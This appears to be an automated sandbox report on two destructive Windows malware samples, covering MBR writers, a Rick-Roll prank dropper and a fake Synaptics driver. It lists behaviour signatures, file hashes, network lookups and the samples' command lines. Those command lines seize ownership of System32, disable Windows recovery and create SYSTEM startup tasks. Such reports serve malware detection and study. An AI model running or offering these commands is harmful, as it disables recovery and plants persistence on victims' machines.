| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows NT 32\MBR.exe | N/A |
| N/A | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files\Windows NT 32\MBR.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\taskkill.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File created | C:\Windows\System32\notepad.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Windows\System32\notepad.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File created | C:\Windows\System32\sfc.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows NT 32\sound.wav | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\MBR.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\lock_files.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\ReAgentc.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe
"C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k color 47 && title Critical process && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && reagentc.exe /disable && Exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
C:\Windows\system32\ReAgentc.exe
reagentc.exe /disable
C:\Program Files\Windows NT 32\MBR.exe
"C:\Program Files\Windows NT 32\MBR.exe"
C:\Program Files\Windows NT 32\AdStRkJ_sound.exe
"C:\Program Files\Windows NT 32\AdStRkJ_sound.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x38c 0x394
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.178.17.96.in-addr.arpa | udp |
Files
memory/864-0-0x00007FF8ADBF0000-0x00007FF8AE6B1000-memory.dmp
memory/864-1-0x000001C250E30000-0x000001C252F90000-memory.dmp
memory/864-2-0x000001C26D560000-0x000001C26D570000-memory.dmp
C:\Program Files\Windows NT 32\lock_files.exe
| MD5 | 7734bece0c7493447d2df4b0a05179d0 |
| SHA1 | f8ab23f32dc38f9ae49e8debb23df5116f8fe6dc |
| SHA256 | 3814d3d7c09d6ad199f43a24ba0b9a831355c3f66bbeb62f9768d995be049593 |
| SHA512 | 88686fa176b439e4c515d453617c47039984c8956be519b410d80d9757c58408f115d57eed0a6b3a14b2d09e4835491d72e5a84abf28e4e7162ef59380dcc385 |
C:\Program Files\Windows NT 32\MBR.exe
| MD5 | a0195c08fbfe459520423bf0a7c20504 |
| SHA1 | 9d62a03597d8c056951e8d377b4db62b51fbbfa3 |
| SHA256 | 95a2cfb0da507b544ae915d6fd2a8d4fd8acb2456310e11d1bc066b531449ea9 |
| SHA512 | 51c9cc7ade18fe5ffd8c58df5f573f625ee6831a8e3d87b8d529ad67a4334a7ca69e311e3a2b93e33b57879c93e20e8d7eef9f3ebc22b55c63f6a7a759bbadc5 |
memory/560-28-0x0000000000400000-0x0000000000433000-memory.dmp
memory/864-29-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-31-0x00007FF8ADBF0000-0x00007FF8AE6B1000-memory.dmp
memory/864-32-0x000001C26D560000-0x000001C26D570000-memory.dmp
C:\Program Files\Windows NT 32\AdStRkJ_sound.exe
| MD5 | 330d74c84f4597a0c7f45b232c7b0ae2 |
| SHA1 | 46d93d7d2907e60c0b5fb3fd7246410c33a591e9 |
| SHA256 | 6b685298579ec278cf041c12ef0ddbc102567ef274bdd43711643da89ba799e1 |
| SHA512 | c88cd6a3e511a76e6baccf9b30ace996689432e335b264996cf6ce3b2f0947515e34151bc620dae1a05d96342be0f856832814a3b7cd5b898b0f8b08ca371814 |
memory/4048-44-0x0000020B7A2E0000-0x0000020B7A308000-memory.dmp
memory/4048-45-0x00007FF8ADBF0000-0x00007FF8AE6B1000-memory.dmp
memory/864-46-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/4048-47-0x0000020B7A6C0000-0x0000020B7A6D0000-memory.dmp
C:\Program Files\Windows NT 32\sound.wav
| MD5 | 7d2e73f2f72bb20fa52bae59caf5a6bd |
| SHA1 | 62370d4921deb4e5144c6de43c05205df84b04ce |
| SHA256 | 6beb0272ada327dd92f7c3a5c2457325e51b7ac1206a816f1109384807660e38 |
| SHA512 | 8a495d7255628eb91cc8c4b56ebf958075e2831e683a20c9be85a7f5082f1372993ad2bbee9fd61bd408fb74108fa699127ffb894105d7f31fcdc0a0c59a0f62 |
memory/864-49-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/864-50-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/864-51-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/4048-52-0x0000020B7C950000-0x0000020B7CAF9000-memory.dmp
memory/864-53-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/4048-55-0x00007FF8ADBF0000-0x00007FF8AE6B1000-memory.dmp
memory/864-56-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/4048-57-0x0000020B7A6C0000-0x0000020B7A6D0000-memory.dmp
memory/864-58-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/864-59-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-61-0x000001C26D560000-0x000001C26D570000-memory.dmp
memory/864-62-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-64-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-66-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-68-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-70-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-72-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-74-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
memory/864-76-0x000001C26E350000-0x000001C26E4F9000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
186s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation | C:\mbr.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| N/A | N/A | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\TrashMalwares-main\\._cache_mbr.exe" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | C:\mbr.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\TrashMalwares-main\\._cache_Synaptics.exe" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\mbr.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MS-RickRoll.exe"
C:\mbr.exe
"C:\mbr.exe"
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe"
C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe" InjUpdate
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe"
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x320 0x478
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 252.215.42.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 216.58.204.78:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
memory/3740-0-0x0000000000010000-0x00000000013B2000-memory.dmp
memory/3740-1-0x00007FFDE5750000-0x00007FFDE6211000-memory.dmp
memory/3740-2-0x00000000035A0000-0x00000000035B0000-memory.dmp
C:\mbr.exe
| MD5 | c85aa1da29f23a5a711e2793d0630b5a |
| SHA1 | e079ef1963a710db2e35380e508eef86ff371fb1 |
| SHA256 | a19c688c6bebe44cc77ecf6bd998bb4f1799cefc91c5bd32cc8d6381e0177139 |
| SHA512 | 162e75f513518d5979f3c4a0e7ca6bf4b4333646bebee73a703c43c67c735f6ed244db25674f786881061418600123e92265e51e9ee5b6d34669ef71b72038cc |
memory/5060-16-0x0000000002490000-0x0000000002491000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe
| MD5 | 578650d2b82375bb0f6be3a9108585b0 |
| SHA1 | 8f25b9a24254c2ec99ee5625c70a0ae7067dc68b |
| SHA256 | 5ee16b324a60878ccef849bec862a4fa551cb304d8ce4056d49df10fb8ec9f2f |
| SHA512 | 4c46d53bab8df399a63b33ac4c4bba2c99663b31fcd3ebb6bd01a9ccf1648a61a7034879fafced99adb9c60388590efb4462e404b9d5da7d8e2e60b480ffc657 |
memory/4084-59-0x0000000000400000-0x000000000043B000-memory.dmp
memory/5060-118-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/932-121-0x0000000002040000-0x0000000002041000-memory.dmp
memory/436-153-0x0000000000400000-0x000000000043B000-memory.dmp
memory/5016-154-0x00007FFDC3C30000-0x00007FFDC3C40000-memory.dmp
memory/5016-156-0x00007FFDC3C30000-0x00007FFDC3C40000-memory.dmp
memory/5016-155-0x00007FFDC3C30000-0x00007FFDC3C40000-memory.dmp
memory/5016-157-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-159-0x00007FFDC3C30000-0x00007FFDC3C40000-memory.dmp
memory/5016-158-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-161-0x00007FFDC3C30000-0x00007FFDC3C40000-memory.dmp
memory/5016-160-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-162-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-163-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-164-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-166-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-165-0x00007FFDC12D0000-0x00007FFDC12E0000-memory.dmp
memory/5016-167-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-168-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-169-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-170-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-171-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-172-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-173-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-175-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-174-0x00007FFDC12D0000-0x00007FFDC12E0000-memory.dmp
memory/5016-176-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-177-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1a3cimMa.xlsm
| MD5 | e566fc53051035e1e6fd0ed1823de0f9 |
| SHA1 | 00bc96c48b98676ecd67e81a6f1d7754e4156044 |
| SHA256 | 8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15 |
| SHA512 | a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04 |
memory/3740-195-0x00000000035A0000-0x00000000035B0000-memory.dmp
memory/3740-198-0x00007FFDE5750000-0x00007FFDE6211000-memory.dmp
memory/3740-199-0x00000000035A0000-0x00000000035B0000-memory.dmp
memory/3740-200-0x00000000035A0000-0x00000000035B0000-memory.dmp
memory/932-201-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/3740-202-0x00000000035A0000-0x00000000035B0000-memory.dmp
memory/3740-203-0x00000000035A0000-0x00000000035B0000-memory.dmp
C:\rick.wav
| MD5 | 2634c1ac24432e18601bcd8171b8248e |
| SHA1 | 01135b2ace7d4437dd8d57a4dd88b0fd45c5bf35 |
| SHA256 | 66f05a63cc9ae2c641a0fe82ea6ada8142464853dd83b749a562235090adb20d |
| SHA512 | 9fc42b412c9aebb29cf6f0e2969b2c5515086114e44f3d4e259a51ee08824d4f1d25ac2f586d5e8915261191399dc7d53f91a6b897d2d5a756ce2ccabddd7cd3 |
memory/932-206-0x0000000002040000-0x0000000002041000-memory.dmp
memory/5016-208-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/5016-211-0x00007FFE03BB0000-0x00007FFE03DA5000-memory.dmp
memory/3740-212-0x00000000035A0000-0x00000000035B0000-memory.dmp
memory/3740-213-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-214-0x00000000035A0000-0x00000000035B0000-memory.dmp
memory/3740-216-0x00000000035A0000-0x00000000035B0000-memory.dmp
memory/3740-219-0x00000000035A0000-0x00000000035B0000-memory.dmp
memory/3740-220-0x00000000035A0000-0x00000000035B0000-memory.dmp
memory/3740-221-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-225-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-226-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-234-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-235-0x0000000022100000-0x0000000022200000-memory.dmp
memory/932-259-0x0000000000400000-0x00000000004E8000-memory.dmp
memory/3740-260-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-264-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-267-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-271-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-276-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-280-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-284-0x0000000022100000-0x0000000022200000-memory.dmp
memory/3740-291-0x0000000022100000-0x0000000022200000-memory.dmp